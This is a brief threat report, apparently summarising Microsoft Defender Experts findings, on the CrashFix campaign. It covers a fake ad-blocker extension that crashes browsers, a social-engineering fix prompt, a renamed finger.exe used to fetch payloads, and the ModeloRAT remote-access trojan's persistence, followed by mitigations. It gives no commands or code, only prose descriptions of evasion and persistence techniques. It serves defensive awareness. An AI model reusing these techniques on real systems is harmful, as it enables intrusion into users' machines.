In January 2026, Microsoft Defender Experts observed an advanced variant of the ClickFix campaign, now labeled CrashFix. This tactic deliberately crashes victims' browsers, tricking them into executing harmful commands under the guise of fixing the issues. The new approach combines browser disruption with social engineering, significantly increasing the chances of successful execution while minimizing the use of conventional exploit techniques. The threat actors take advantage of trusted user actions, making behavior-based detection and user awareness essential for defense. The attack typically starts with victims searching for an ad blocker and encountering a malicious ad that directs them to a fake Chrome Web Store page. Users are misled into installing a harmful extension that mimics the legitimate uBlock Origin Lite. Once installed, the extension creates browser disruptions through an infinite loop, leading victims to a fraudulent CrashFix warning. A key component of this variant is the misuse of the Windows utility finger.exe, which is renamed to ct.exe to avoid detection. This renamed executable connects to an attacker-controlled IP address, from which it retrieves additional malicious payloads. The core of the operation revolves around a Remote Access Trojan (RAT) called ModeloRAT, which uses a bundled Python environment to execute malicious scripts. The RAT communicates with command-and-control servers, ensuring persistence by modifying registry entries for automatic execution at user login. It performs extensive reconnaissance on the compromised system, gathering detailed domain and network information. The attackers deploy additional payloads, including a Python script that creates a scheduled task to maintain access every five minutes. To mitigate these threats, organizations are advised to enable cloud-delivered protection in antivirus software and run endpoint detection in block mode. Implementing network filtering to restrict outbound access and encouraging the use of secure browsers like Microsoft Edge can further reduce vulnerabilities.